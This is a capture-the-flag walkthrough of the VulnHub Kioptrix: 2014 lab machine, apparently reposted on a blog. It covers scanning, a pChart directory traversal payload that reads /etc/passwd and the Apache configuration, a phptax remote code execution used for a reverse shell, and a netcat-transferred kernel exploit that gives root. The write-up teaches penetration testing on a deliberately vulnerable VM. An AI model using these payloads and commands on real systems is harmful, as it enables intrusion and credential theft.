VulnHub: Kioptrix: 2014-泓源视野

VulnHub: Kioptrix: 2014

Link: https://www.vulnhub.com/entry/kioptrix-2014-5,62/

  1. Network Discovery
nmap -sn 10.0.2.24/24

The target IP is 10.0.2.20.

VulnHub: Kioptrix: 2014插图

VulnHub: Kioptrix: 2014插图1

2. Port scan

nmap -Pn 10.0.2.20

There’re 2 open ports: 80 and 8080.

VulnHub: Kioptrix: 2014插图2

VulnHub: Kioptrix: 2014插图3

3. OS and service scan

nmap -A -p22,80,8080 10.0.2.20

There’re HTTP sites on both ports.

VulnHub: Kioptrix: 2014插图4

VulnHub: Kioptrix: 2014插图5

4. Vuln scan

nmap --script vuln -p22,80,8080 10.0.2.20

Couldn't find any more useful information.

VulnHub: Kioptrix: 2014插图6

VulnHub: Kioptrix: 2014插图7

5. Nikto scan

Port 80

nikto -h http://10.0.2.20

This system may be vulnerable to a remote buffer overflow.

VulnHub: Kioptrix: 2014插图8

VulnHub: Kioptrix: 2014插图9

Port 8080

nikto -h http://10.0.2.20:8080

The result was similar to port 80’s.

VulnHub: Kioptrix: 2014插图10

VulnHub: Kioptrix: 2014插图11

6. Directory scan

Port 80

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/ -x php,txt,html,sh,c
gi -q

/index.html

VulnHub: Kioptrix: 2014插图12

VulnHub: Kioptrix: 2014插图13

Port 8080

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.20/:8080 -x php,txt,html,sh,c
gi -q

I got a 403 return code.

VulnHub: Kioptrix: 2014插图14

VulnHub: Kioptrix: 2014插图15

7. Exploit w/ mod_ssl

I came across this script.

heltonWernik/OpenLuck

Original is OpenFu*&%$#, I change for something more elegant This Exploit ( https://www.exploit-db.com/exploits/764/)…

github.com

From previous Nikto scan:

Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8

There’s no correct version in this script. I’ll have to try another way.

VulnHub: Kioptrix: 2014插图16

VulnHub: Kioptrix: 2014插图17

8. Accessing HTTP site

Start w/ port 80

VulnHub: Kioptrix: 2014插图18

VulnHub: Kioptrix: 2014插图19

View page source -> pChart2.1.3

VulnHub: Kioptrix: 2014插图20

VulnHub: Kioptrix: 2014插图21

Accessing port 8080

VulnHub: Kioptrix: 2014插图22

VulnHub: Kioptrix: 2014插图23

Viewing page source showed nothing

VulnHub: Kioptrix: 2014插图24

VulnHub: Kioptrix: 2014插图25

Back to port 80, I googled pChart2.1.3. and came across the exploit-db site.

Offensive Security's Exploit Database Archive

Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS # Date: 2014-01-24 # Exploit Author: Balazs Makany #…

www.exploit-db.com

Starting w/ Directory Traversal

VulnHub: Kioptrix: 2014插图26

VulnHub: Kioptrix: 2014插图27

Test the exploit

Acces pChart, intercept request w/ Burp Suite, and send to the Repeater

http://10.0.2.20/pChart2.1.3/examples/index.php
VulnHub: Kioptrix: 2014插图28

VulnHub: Kioptrix: 2014插图29

Test the exploit

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
VulnHub: Kioptrix: 2014插图30

VulnHub: Kioptrix: 2014插图31

/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/shadow

I don’t have permission to view this.

VulnHub: Kioptrix: 2014插图32

VulnHub: Kioptrix: 2014插图33

Back to the site on port 8080, I suspected that it returned forbidden status (403) because I didn't have the right agent.

user-agent configuration is located in

/usr/local/etc/apache22/httpd.conf

Let’s try w/ the exploit

Success!!!

VulnHub: Kioptrix: 2014插图34

VulnHub: Kioptrix: 2014插图35

After reading through the file, I found that user-agent was set to be Mozilla 4.0

VulnHub: Kioptrix: 2014插图36

VulnHub: Kioptrix: 2014插图37

I used this list of agents

Link: https://gist.github.com/pzb/b4b6f57144aea7827ae4

I used agent-switcher plugin w/ firefox and I can access the site.

VulnHub: Kioptrix: 2014插图38

VulnHub: Kioptrix: 2014插图39

It’s phptax.

VulnHub: Kioptrix: 2014插图40

VulnHub: Kioptrix: 2014插图41

Viewing page source revealed nothing

VulnHub: Kioptrix: 2014插图42

VulnHub: Kioptrix: 2014插图43

Googling phptax exploit

Offensive Security's Exploit Database Archive

phptax 0.8 - Remote Code Execution. CVE-86992 . webapps exploit for PHP platform

www.exploit-db.com

VulnHub: Kioptrix: 2014插图44

VulnHub: Kioptrix: 2014插图45

I will set up listener for reverse shell on port 1234

swisskyrepo/PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings

github.com

I succeeded using this.

VulnHub: Kioptrix: 2014插图46

VulnHub: Kioptrix: 2014插图47

Edit IP and encode to URL w/ Burp Suite

VulnHub: Kioptrix: 2014插图48

VulnHub: Kioptrix: 2014插图49

Modified exploit string w/ encoded reverse shell command

VulnHub: Kioptrix: 2014插图50

VulnHub: Kioptrix: 2014插图51

Paste it to the browser, now I have a shell

VulnHub: Kioptrix: 2014插图52

VulnHub: Kioptrix: 2014插图53

9. Privilege escalation

Verify user

whoami

Seaching for password in:

/home, /tmp, /var/mail, /var/log

I couldn't find any usernames or passwords

Verify /etc/passwd permission

VulnHub: Kioptrix: 2014插图54

VulnHub: Kioptrix: 2014插图55

Verify /etc/shadow permission

VulnHub: Kioptrix: 2014插图56

VulnHub: Kioptrix: 2014插图57

Verify sudo

sudo -l
VulnHub: Kioptrix: 2014插图58

VulnHub: Kioptrix: 2014插图59

Verify SUID

find / -perm -u=s -type f 2>/dev/null

Nothing that I can use.

VulnHub: Kioptrix: 2014插图60

VulnHub: Kioptrix: 2014插图61

Verify capabilities

getcap -r / 2>/dev/null
VulnHub: Kioptrix: 2014插图62

VulnHub: Kioptrix: 2014插图63

Verify cron

cat /etc/crontab

Nothing that I can use.

VulnHub: Kioptrix: 2014插图64

VulnHub: Kioptrix: 2014插图65

Verify kernel

uname -a
VulnHub: Kioptrix: 2014插图66

VulnHub: Kioptrix: 2014插图67

Googling up, I found 3 scripts.

VulnHub: Kioptrix: 2014插图68

VulnHub: Kioptrix: 2014插图69

Tried the first script

VulnHub: Kioptrix: 2014插图70

VulnHub: Kioptrix: 2014插图71

searchsploit -m 28718
VulnHub: Kioptrix: 2014插图72

VulnHub: Kioptrix: 2014插图73

Prepare HTTP server at attacker machine

python -m SimpleHTTPServer 80
VulnHub: Kioptrix: 2014插图74

VulnHub: Kioptrix: 2014插图75

Prepare to store at /tmp on target machine

cd /tmp

I don’t have get command.

VulnHub: Kioptrix: 2014插图76

VulnHub: Kioptrix: 2014插图77

I’ll retrive w/ netcat instead.

On attacker machince

nc -nvlp 1337 < 28718.c
VulnHub: Kioptrix: 2014插图78

VulnHub: Kioptrix: 2014插图79

On target machine

nc -nv 10.0.2.7 1337 > priv.c
VulnHub: Kioptrix: 2014插图80

VulnHub: Kioptrix: 2014插图81

Compile

gcc priv.c -o priv
VulnHub: Kioptrix: 2014插图82

VulnHub: Kioptrix: 2014插图83

Run the compiled script

./priv

Now I’m root.

VulnHub: Kioptrix: 2014插图84

VulnHub: Kioptrix: 2014插图85

cd /root
VulnHub: Kioptrix: 2014插图86

VulnHub: Kioptrix: 2014插图87

cat congrats.txt
VulnHub: Kioptrix: 2014插图88

VulnHub: Kioptrix: 2014插图89

ratiros01

Mar 12

Link: https://www.vulnhub.com/entry/kioptrix-level-13-4,25

  1. Network Discovery
nmap -sn 10.0.2.24/24

The machine ‘10.0.2.9’ is the target.

VulnHub: Kioptrix: 2014插图90

VulnHub: Kioptrix: 2014插图91

2. Port scan

nmap -Pn 10.0.2.9nmap -Pn -p1000- 10.0.2.9

There’re 4 ports: 22, 80, 139, 445.

Read more · 5 min read

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
2

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8231134 位访客, 您的IP是:[172.69.62.12]